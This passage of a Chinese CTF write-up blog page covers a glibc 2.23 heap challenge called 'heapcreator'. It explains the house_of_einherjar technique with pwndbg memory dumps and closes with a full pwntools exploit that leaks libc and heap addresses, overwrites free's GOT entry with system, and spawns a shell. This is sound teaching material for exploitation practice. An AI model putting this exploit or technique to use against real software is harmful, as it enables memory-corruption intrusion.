<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">2</span>gx <span class="number">0x2368010</span></span><br><span class="line"><span class="number">0x2368010</span>:	<span class="number">0x0000000000000080</span>	<span class="number">0x0000000002368030</span></span><br><span class="line">pwndbg&gt; x/<span class="number">4</span>gx <span class="number">0x0000000002368030</span><span class="number">-0x10</span></span><br><span class="line"><span class="number">0x2368020</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000091</span></span><br><span class="line"><span class="number">0x2368030</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x00007fb1f48beb78</span></span><br></pre></td></tr></table></figure>

<h3 id="关键point"><a href="#关键point" class="headerlink" title="关键point"></a>关键point</h3><p>这个题的关键难点在于适合实现shell，劫持malloc_hook也好，覆盖got表也好都需要实现任意地址写，这里我们用到一个unlink手法house_of_einherjar。这项技术使用的前提就是存在溢出，至少1字节，来修改一个allocated_chunk的prev_size和prev_inuse。</p>
<blockquote>
<p>house_of_einherjar&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&gt;<br>    而此手法有几个点值得关注，1，我们可以认为的修改一个allocted_chunk的prev_size,以及prev_inuse.我们需要构造一个fake_chunk(一个方面泄露栈地址，在栈上伪造一个chunk，这个方法配合修改eip使用，但是因为栈的内容会发生变化，就要进一步思考控制具体到哪里。其二可以在bss段上伪造chunk，达到修改全局变量的目的。其三可以控制到got表，修改got表。其四控制到malloc_hook,free_hook,reallok_hook,使用onegadget)。 prev_size &#x3D; victim_chunk_size - aimed_address。 同时我们还需要利用victim的前一个allocted chunk A， 申请的大小不要使16位对齐，0x10*k+8,这样就可以在申请到victim B后，prev_size允许被A使用，同时可以利用off_by_one技术NULL溢出修改B的prev_inuse（将其改为0），这样unlink通过chunk_addr_B - prev_size 定位到fake_chunk,因为bss以及栈地址通常会比heap地址大，所以prev_size传入的是一个负数，但是因为prev_size是无符号数，发生溢出，就这样虽然我们free B，向前unlink，结果其实把后面的fakechunk合并到一起，而且新的堆头地址是fakechunk。注意构造fake_chunk时,要保证其可以pass unlink的检查 </p>
<p>p-&gt;fd-&gt;bk&#x3D;p,p-&gt;bk-&gt;fd&#x3D;p,p-&gt;prev_size &#x3D; p-&gt;bk-&gt;size，p-&gt;fd-&gt;prev_size &#x3D; p-&gt;size,最简单的就是将fd、bk指向自己。unlink时，不会改变被合并的堆块的数据，只会更改新的堆头数据,此时fakechunk就是新的topchunk</p>
</blockquote>
<p>我们在对快中伪造一个个fakechunk，然后修改victim_chunk,这里要注意的是，victim_chunk必须与topchunk相邻，才可以实现fake_top_chunk.这里细解释下为什么这样做，这样做的目的是，在unlink前，我们已经申请出一些堆块，比如存在一个结构体堆块，而这个堆块的地址比fakechunk大，那么unlink后，这个堆块的数据不变，但是topchunk的位置在这个堆块之前，我们就可以再次利用到这个堆块，换言之，我们申请一个很大堆块，那么刚刚所说 结构体会被包含，当我们编辑这个大堆块的内容时，控制长度就可以将其覆盖，而我们有知道结构体里面还有一个content的指针，如果我们把这个覆盖这个指针，就实现了任意地址写。</p>
<p>这里要解决几个问题，每次创建的时候会申请出来两个堆块，一个大小0x20,一个为size。为了溢出，我们就要考虑堆块的布局，这里我提供一种</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">&quot;\x00&quot;</span>)		<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;aaaa&#x27;</span>)		<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x50</span>,<span class="string">&#x27;aaaa&#x27;</span>)		<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x88</span>,<span class="string">&#x27;ssss&#x27;</span>)		<span class="comment">#3</span></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p>0用来leak libc_base,我们重复利用，1我们构造了两个大小相等的堆块</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x21</span>:struct0---&gt; struct1 ---&gt;content1 ---&gt;struct2 ---&gt;struct3 ---&gt;<span class="number">0</span></span><br><span class="line"><span class="number">0x61</span>:conten2 ---&gt;<span class="number">0</span></span><br><span class="line"></span><br><span class="line">unsortedbins: content0 ---&gt;content3 ---&gt;main_arena			<span class="comment">//(FIFO)</span></span><br><span class="line">    </span><br><span class="line"> fastbins</span><br><span class="line"><span class="number">0x20</span>: <span class="number">0x2368000</span> —▸ <span class="number">0x23680b0</span> —▸ <span class="number">0x23680d0</span> —▸ <span class="number">0x23680f0</span> —▸ <span class="number">0x2368170</span> ◂— ...</span><br><span class="line"><span class="number">0x30</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x40</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x50</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x60</span>: <span class="number">0x2368110</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">0x70</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x80</span>: <span class="number">0x0</span></span><br><span class="line">unsortedbin</span><br><span class="line">all: <span class="number">0x2368020</span> —▸ <span class="number">0x7fb1f48beb78</span> (main_arena+<span class="number">88</span>) ◂— <span class="number">0x2368020</span></span><br></pre></td></tr></table></figure>

<p>在重新申请堆块的过程中我们还要完成堆地址的泄露，这里其实有两个选择，一种是将struct申请作为content，因为free的时候，struct.ptr没有被清空，可以被泄露。另外一种就是不考虑时那种堆块，只要不是fastbin的最后一个，申请出来时，fd指针没有被清空，此时我们输入的content只要时其最低字节就可以（heap的地址最低三字节一定是0x000，通过计算 可以得到对低字节）。content3与topchunk相邻，释放后会与其合并，我们不需要考虑，因为unsortedbin里只有0x90的content0，只要申请的堆块比他大，就会从topchunk获取，因为0x21大小的堆块在fastbin里面有好几个，就可以是的从topchunk连续获得两个较大的堆块，这样edit前面堆块就可以完成溢出，fake chunk的构造需要一定的空间，所以我们使用了0x50的堆块。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">fakechunk:<span class="number">0x2368120</span></span><br><span class="line">pwndbg&gt; x/<span class="number">12</span>gx <span class="number">0x0000000002368120</span><span class="number">-0x10</span></span><br><span class="line"><span class="number">0x2368110</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000061</span></span><br><span class="line"><span class="number">0x2368120</span>:	<span class="number">0x0000000000000100</span>	<span class="number">0x0000000000000110</span><span class="comment">//fakesize = victim_prev_size</span></span><br><span class="line"><span class="number">0x2368130</span>:	<span class="number">0x0000000002368120</span>	<span class="number">0x0000000002368120</span><span class="comment">//为了方便绕过检查，fd,bk直接指向fakechunk</span></span><br><span class="line"><span class="number">0x2368140</span>:	<span class="number">0x0000000002368120</span>	<span class="number">0x0000000002368120</span></span><br><span class="line"><span class="number">0x2368150</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368160</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line"> fake_size = fake_prev_size = victimchunk-fakechunk</span><br><span class="line"> pwndbg&gt; x/<span class="number">18</span>gx <span class="number">0x00000000023681a0</span><span class="number">-0x10</span>		<span class="comment">//victimchunk</span></span><br><span class="line"><span class="number">0x2368190</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x00000000000000a1</span></span><br><span class="line"><span class="number">0x23681a0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681b0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681c0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681d0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681e0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681f0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368200</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368210</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line">pwndbg&gt; x/<span class="number">24</span>gx <span class="number">0x00000000023681a0</span><span class="number">-0x10</span>		<span class="comment">//edit时覆盖victimchunk</span></span><br><span class="line"><span class="number">0x2368190</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x00000000000000a1</span></span><br><span class="line"><span class="number">0x23681a0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681b0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681c0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681d0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681e0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x23681f0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368200</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368210</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368220</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x2368230</span>:	<span class="number">0x0000000000000110</span>	<span class="number">0x0000000000000130</span></span><br><span class="line"><span class="number">0x2368240</span>:	<span class="number">0x0000000000006262</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里就完成了布局，现在只要free victim_chunk</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/8gx 0x0000000002368120-0x10</span><br><span class="line">0x2368110:	0x0000000000000000	0x0000000000000061</span><br><span class="line">0x2368120:	0x0000000000000100	0x0000000000020ee1</span><br><span class="line">0x2368130:	0x0000000002368120	0x0000000002368120</span><br><span class="line">0x2368140:	0x0000000002368120	0x0000000002368120</span><br><span class="line">//此时fakechunk的size变了，其实这就是fakesize+victim_size+topchunk_size</span><br></pre></td></tr></table></figure>

<p>这个时候我们在申请一个堆块，并填充一些东西（偏移量在调试中查看）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pad = <span class="string">b&quot;/bin/sh\x00&quot;</span>+ <span class="string">b&#x27;\x00&#x27;</span> * (<span class="number">0x180</span>-<span class="number">0x130</span>-<span class="number">16</span>) +p64(<span class="number">0x21</span>)+p64(<span class="number">50</span>) +p64(free_got)</span><br><span class="line">add(<span class="number">0x200</span>,pad)</span><br></pre></td></tr></table></figure>

<p>新申请的堆块就是从fakechunk开始分配，后面自行调试偏移量</p>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line">r=process(<span class="string">&#x27;./heapcreator&#x27;</span>)</span><br><span class="line">elf =ELF(<span class="string">&quot;./heapcreator&quot;</span>)</span><br><span class="line">free_got = elf.got[<span class="string">&#x27;free&#x27;</span>]</span><br><span class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">Gptr = <span class="number">0x006020A0</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ch</span>(<span class="params">i</span>):</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;Your choice :&quot;</span>,<span class="built_in">str</span>(i))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size,text</span>):</span><br><span class="line">	ch(<span class="number">1</span>)</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;Size of Heap : &quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">	r.sendafter(<span class="string">&quot;Content of heap:&quot;</span>,text)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx,text</span>):</span><br><span class="line">	ch(<span class="number">2</span>)</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(idx))</span><br><span class="line">	r.sendafter(<span class="string">&quot;Content of heap : &quot;</span>,text)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">	ch(<span class="number">3</span>)</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(idx))	</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">	ch(<span class="number">4</span>)</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(idx))	</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(r,&#x27;b malloc&#x27;)</span></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">&quot;\x00&quot;</span>)</span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">add(<span class="number">0x50</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">add(<span class="number">0x88</span>,<span class="string">&#x27;ssss&#x27;</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">&#x27;aaaaaaaa&#x27;</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">b&quot;a&quot;</span>*<span class="number">8</span>)</span><br><span class="line">main_arena = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(main_arena))</span><br><span class="line">offset = <span class="number">0x7f3d1c53cb78</span>-<span class="number">0x7f3d1c178000</span></span><br><span class="line"><span class="comment">#aimed_addr   </span></span><br><span class="line">malloc_hook=main_arena - <span class="number">0x68</span></span><br><span class="line">lib_base = main_arena-offset</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(lib_base))</span><br><span class="line">system_addr= libc.symbols[<span class="string">&#x27;system&#x27;</span>]+lib_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;system : &quot;</span>,<span class="built_in">hex</span>(system_addr))</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x98</span>,<span class="string">&quot;aa&quot;</span>)</span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;\xf0&#x27;</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Content : &quot;</span>)</span><br><span class="line">heap_addr = u64(r.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0xf0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(heap_addr))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x120</span>,<span class="string">&quot;bb&quot;</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,<span class="string">b&#x27;\x00&#x27;</span> * ( <span class="number">0x90</span>)+p64(<span class="number">0x110</span>)+p64(<span class="number">0x30</span>))</span><br><span class="line">add(<span class="number">0x50</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">edit(<span class="number">3</span>,p64(<span class="number">0x100</span>)+p64(<span class="number">0x110</span>)+p64(heap_addr+<span class="number">0x120</span>)*<span class="number">4</span>)</span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">pad = <span class="string">b&quot;/bin/sh\x00&quot;</span>+ <span class="string">b&#x27;\x00&#x27;</span> * (<span class="number">0x180</span>-<span class="number">0x130</span>-<span class="number">16</span>) +p64(<span class="number">0x21</span>)+p64(<span class="number">50</span>) +p64(free_got)</span><br><span class="line">add(<span class="number">0x200</span>,pad)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">3</span>,p64(system_addr))</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
        <div class="side">
			<ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%99%E6%AC%A1%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E5%BC%80%E5%A7%8B%E7%9D%80%E9%87%8D%E6%95%B4%E7%90%86%E4%B8%8B%E5%9C%A8Glibc-2-23%E4%B8%8B%E7%9A%84%E4%B8%80%E4%BA%9B%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BF"><span class="toc-number">1.</span> <span class="toc-text">这次刷题记录开始着重整理下在Glibc-2.23下的一些利用姿势</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%85%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">浅析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#main"><span class="toc-number">2.1.</span> <span class="toc-text">main</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MENU"><span class="toc-number">2.2.</span> <span class="toc-text">MENU</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Creat"><span class="toc-number">2.3.</span> <span class="toc-text">Creat</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Edit"><span class="toc-number">2.4.</span> <span class="toc-text">Edit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Show"><span class="toc-number">2.5.</span> <span class="toc-text">Show</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Free"><span class="toc-number">2.6.</span> <span class="toc-text">Free</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwning"><span class="toc-number">3.</span> <span class="toc-text">pwning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E5%89%8D%E7%9A%84%E5%87%86%E5%A4%87"><span class="toc-number">3.1.</span> <span class="toc-text">开始前的准备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#leak-the-libc-base"><span class="toc-number">3.2.</span> <span class="toc-text">leak the libc_base</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E9%94%AEpoint"><span class="toc-number">3.3.</span> <span class="toc-text">关键point</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP"><span class="toc-number">4.</span> <span class="toc-text">EXP</span></a></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
